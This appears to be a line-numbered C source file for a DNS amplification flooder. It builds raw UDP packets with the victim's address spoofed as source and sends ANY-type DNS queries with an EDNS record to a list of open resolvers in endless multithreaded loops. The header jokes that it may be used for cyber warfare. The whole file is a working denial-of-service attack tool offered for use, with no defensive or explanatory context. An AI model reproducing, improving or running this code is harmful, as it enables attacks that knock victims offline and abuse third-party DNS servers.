1
/*
2
        This is released under the GNU GPL License v3.0, and is allowed to be used for cyber warfare. ;)
3
*/
4
 
5
#include <time.h>
6
#include <pthread.h>
7
#include <unistd.h>
8
#include <stdio.h>
9
#include <stdlib.h>
10
#include <string.h>
11
#include <sys/socket.h>
12
#include <netinet/ip.h>
13
#include <netinet/udp.h>
14
#include <arpa/inet.h>
15
 
16
#define MAX_PACKET_SIZE 8192
17
#define PHI 0x9e3779b9
18
#define PACKETS_PER_RESOLVER 5
19
 
20
static uint32_t Q[4096], c = 362436;
21
 
22
struct list
23
{
24
                struct sockaddr_in data;
25
                char domain[256];
26
                int line;
27
                struct list *next;
28
                struct list *prev;
29
};
30
struct list *head;
31
 
32
struct thread_data{
33
                int thread_id;
34
                struct list *list_node;
35
                struct sockaddr_in sin;
36
                int port;
37
};
38
 
39
struct DNS_HEADER
40
{
41
                unsigned short id; // identification number
42
 
43
                unsigned char rd :1; // recursion desired
44
                unsigned char tc :1; // truncated message
45
                unsigned char aa :1; // authoritive answer
46
                unsigned char opcode :4; // purpose of message
47
                unsigned char qr :1; // query/response flag
48
 
49
                unsigned char rcode :4; // response code
50
                unsigned char cd :1; // checking disabled
51
                unsigned char ad :1; // authenticated data
52
                unsigned char z :1; // its z! reserved
53
                unsigned char ra :1; // recursion available
54
 
55
                unsigned short q_count; // number of question entries
56
                unsigned short ans_count; // number of answer entries
57
                unsigned short auth_count; // number of authority entries
58
                unsigned short add_count; // number of resource entries
59
};
60
 
61
//Constant sized fields of query structure
62
struct QUESTION
63
{
64
        unsigned short qtype;
65
        unsigned short qclass;
66
};
67
 
68
//Constant sized fields of the resource record structure
69
struct QUERY
70
{
71
                unsigned char *name;
72
                struct QUESTION *ques;
73
};
74
 
75
void ChangetoDnsNameFormat(unsigned char* dns,unsigned char* host)
76
{
77
                int lock = 0 , i;
78
                strcat((char*)host,".");
79
 
80
                for(i = 0 ; i < strlen((char*)host) ; i++)
81
                {
82
                                if(host[i]=='.')
83
                                {
84
                                                *dns++ = i-lock;
85
                                                for(;lock<i;lock++)
86
                                                {
87
                                                                *dns++=host[lock];
88
                                                }
89
                                                lock++; //or lock=i+1;
90
                                }
91
                }
92
                *dns++='\0';
93
}
94
 
95
void init_rand(uint32_t x)
96
{
97
                int i;
98
 
99
                Q[0] = x;
100
                Q[1] = x + PHI;
101
                Q[2] = x + PHI + PHI;
102
 
103
                for (i = 3; i < 4096; i++)
104
                Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
105
}
106
 
107
uint32_t rand_cmwc(void)
108
{
109
                uint64_t t, a = 18782LL;
110
                static uint32_t i = 4095;
111
                uint32_t x, r = 0xfffffffe;
112
                i = (i + 1) & 4095;
113
                t = a * Q[i] + c;
114
                c = (t >> 32);
115
                x = t + c;
116
                if (x < c) {
117
                                x++;
118
                                c++;
119
                }
120
                return (Q[i] = r - x);
121
}
122
 
123
/* function for header checksums */
124
unsigned short csum (unsigned short *buf, int nwords)
125
{
126
                unsigned long sum;
127
                for (sum = 0; nwords > 0; nwords--)
128
                sum += *buf++;
129
                sum = (sum >> 16) + (sum & 0xffff);
130
                sum += (sum >> 16);
131
                return (unsigned short)(~sum);
132
}
133
 
134
void setup_udp_header(struct udphdr *udph)
135
{
136
 
137
}
138
 
139
void *flood(void *par1)
140
{
141
                struct thread_data *td = (struct thread_data *)par1;
142
 
143
                fprintf(stdout, "Thread %d started\n", td->thread_id);
144
 
145
                char strPacket[MAX_PACKET_SIZE];
146
                int iPayloadSize = 0;
147
 
148
                struct sockaddr_in sin = td->sin;
149
                struct list *list_node = td->list_node;
150
                int iPort = td->port;
151
 
152
                int s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
153
                if(s < 0)
154
                {
155
                        fprintf(stderr, "Could not open raw socket. You need to be root!\n");
156
                        exit(-1);
157
                }
158
 
159
                //init random
160
                init_rand(time(NULL));
161
 
162
                // Clear the data
163
                memset(strPacket, 0, MAX_PACKET_SIZE);
164
 
165
                // Make the packet
166
                struct iphdr *iph = (struct iphdr *) &strPacket;
167
                iph->ihl = 5;
168
                iph->version = 4;
169
                iph->tos = 0;
170
                iph->tot_len = sizeof(struct iphdr) + 38;
171
                iph->id = htonl(54321);
172
                iph->frag_off = 0;
173
                iph->ttl = MAXTTL;
174
                iph->protocol = IPPROTO_UDP;
175
                iph->check = 0;
176
                iph->saddr = inet_addr("192.168.3.100");
177
 
178
                iPayloadSize += sizeof(struct iphdr);
179
 
180
 
181
                struct udphdr *udph = (struct udphdr *) &strPacket[iPayloadSize];
182
                udph->source = htons(iPort);
183
                udph->dest = htons(53);
184
                udph->check = 0;
185
 
186
                iPayloadSize += sizeof(struct udphdr);
187
 
188
                struct DNS_HEADER *dns  = (struct DNS_HEADER *) &strPacket[iPayloadSize];
189
                dns->id = (unsigned short) htons(rand_cmwc());
190
                dns->qr = 0; //This is a query
191
                dns->opcode = 0; //This is a standard query
192
                dns->aa = 0; //Not Authoritative
193
                dns->tc = 0; //This message is not truncated
194
                dns->rd = 1; //Recursion Desired
195
                dns->ra = 0; //Recursion not available! hey we dont have it (lol)
196
                dns->z = 0;
197
                dns->ad = 0;
198
                dns->cd = 0;
199
                dns->rcode = 0;
200
                dns->q_count = htons(1); //we have only 1 question
201
                dns->ans_count = 0;
202
                dns->auth_count = 0;
203
                dns->add_count = htons(1);
204
 
205
                iPayloadSize += sizeof(struct DNS_HEADER);
206
 
207
                sin.sin_port = udph->source;
208
                iph->saddr = sin.sin_addr.s_addr;
209
                iph->daddr = list_node->data.sin_addr.s_addr;
210
                iph->check = csum ((unsigned short *) strPacket, iph->tot_len >> 1);
211
 
212
 
213
                char strDomain[256];
214
                int i;
215
                int iAdditionalSize = 0;
216
                while(1)
217
                {
218
                                                usleep(0);
219
                        //set the next node
220
                        list_node = list_node->next;
221
 
222
                        //Clear the old domain and question
223
                        memset(&strPacket[iPayloadSize + iAdditionalSize], 0, iAdditionalSize);
224
 
225
                        //add the chosen domain and question
226
                        iAdditionalSize = 0;
227
 
228
                        unsigned char *qname = (unsigned char*) &strPacket[iPayloadSize + iAdditionalSize];
229
 
230
                        strcpy(strDomain, list_node->domain);
231
                        ChangetoDnsNameFormat(qname, strDomain);
232
                        //printf("!!%s %d\n", list_node->domain, list_node->line);
233
 
234
                        iAdditionalSize += strlen(qname) + 1;
235
 
236
                        struct QUESTION *qinfo = (struct QUESTION *) &strPacket[iPayloadSize + iAdditionalSize];
237
                        qinfo->qtype = htons(255); //type of the query , A , MX , CNAME , NS etc
238
                        qinfo->qclass = htons(1);
239
 
240
                        iAdditionalSize += sizeof(struct QUESTION);
241
 
242
                      void *edns = (void *) &strPacket[iPayloadSize + iAdditionalSize];
243
                memset(edns+2, 0x29, 1);
244
                memset(edns+3, 0x23, 1);
245
                memset(edns+4, 0x28, 1);
246
 
247
 
248
                        iAdditionalSize += 11;
249
 
250
                        //set new node data
251
                        iph->daddr = list_node->data.sin_addr.s_addr;
252
 
253
                        udph->len= htons((iPayloadSize + iAdditionalSize + 5) - sizeof(struct iphdr));
254
                        iph->tot_len = iPayloadSize + iAdditionalSize + 5;
255
 
256
                        udph->source = htons(rand_cmwc() & 0xFFFF);
257
                        iph->check = csum ((unsigned short *) strPacket, iph->tot_len >> 1);
258
 
259
                        //send
260
                        for(i = 0; i < PACKETS_PER_RESOLVER; i++)
261
                        {
262
                                sendto(s, strPacket, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
263
                        }
264
                }
265
}
266
 
267
void ParseResolverLine(char *strLine, int iLine)
268
{
269
        char caIP[32] = "";
270
        char caDNS[512] = "";
271
 
272
        int i;
273
        char buffer[512] = "";
274
 
275
        int moved = 0;
276
 
277
        for(i = 0; i < strlen(strLine); i++)
278
        {
279
                if(strLine[i] == ' ' || strLine[i] == '\n' || strLine[i] == '\t')
280
                {
281
                        moved++;
282
                        continue;
283
                }
284
 
285
                if(moved == 0)
286
                {
287
                        caIP[strlen(caIP)] = (char) strLine[i];
288
                }
289
                else if(moved == 1)
290
                {
291
                        caDNS[strlen(caDNS)] = (char) strLine[i];
292
                }
293
        }
294
 
295
        //printf("Found resolver %s, domain %s!\n", caIP, caDNS);
296
 
297
        if(head == NULL)
298
        {
299
                head = (struct list *)malloc(sizeof(struct list));
300
 
301
                bzero(&head->data, sizeof(head->data));
302
 
303
                head->data.sin_addr.s_addr=inet_addr(caIP);
304
                head->data.sin_port=htons(53);
305
                strcpy(head->domain, caDNS);
306
                head->line = iLine;
307
                head->next = head;
308
                head->prev = head;
309
        }
310
        else
311
        {
312
                struct list *new_node = (struct list *)malloc(sizeof(struct list));
313
 
314
                memset(new_node, 0x00, sizeof(struct list));
315
 
316
                new_node->data.sin_addr.s_addr=inet_addr(caIP);
317
                new_node->data.sin_port=htons(53);
318
                strcpy(new_node->domain, caDNS);
319
                new_node->prev = head;
320
                head->line = iLine;
321
                new_node->next = head->next;
322
                head->next = new_node;
323
        }
324
}
325
 
326
int main(int argc, char *argv[ ])
327
{
328
        if(argc < 4)
329
        {
330
                fprintf(stderr, "Invalid parameters!\n");
331
                fprintf(stdout, "\nUsage: %s <target IP/hostname> <port to hit> <reflection file> <number threads to use> <time>\n", argv[0]);
332
                exit(-1);
333
        }
334
 
335
        head = NULL;
336
 
337
        char *strLine = (char *) malloc(256);
338
        strLine = memset(strLine, 0x00, 256);
339
 
340
        char strIP[32] = "";
341
        char strDomain[256] = "";
342
 
343
        int iLine = 0; // 0 = ip, 1 = domain.
344
 
345
        FILE *list_fd = fopen(argv[3],  "r");
346
        while(fgets(strLine, 256, list_fd) != NULL)
347
        {
348
                ParseResolverLine(strLine, iLine);
349
                iLine++;
350
        }
351
 
352
 
353
        int i = 0;
354
        int num_threads = atoi(argv[4]);
355
 
356
        struct list *current = head->next;
357
        pthread_t thread[num_threads];
358
        struct sockaddr_in sin;
359
        sin.sin_family = AF_INET;
360
        sin.sin_port = htons(0);
361
        sin.sin_addr.s_addr = inet_addr(argv[1]);
362
        struct thread_data td[num_threads];
363
 
364
        int iPort = atoi(argv[2]);
365
 
366
                printf("Flooding %s\n", argv[1], iPort);
367
 
368
        for(i = 0; i < num_threads; i++)
369
        {
370
                td[i].thread_id = i;
371
                td[i].sin= sin;
372
                td[i].list_node = current;
373
                td[i].port = iPort;
374
                pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
375
        }
376
 
377
        fprintf(stdout, "Starting Flood...\n");
378
 
379
        if(argc > 4)
380
        {
381
                sleep(atoi(argv[5]));
382
        }
383
        else
384
        {
385
                while(1)
386
                {
387
                        sleep(1);
388
                }
389
        }
390
 
391
        return 0;
392
}
393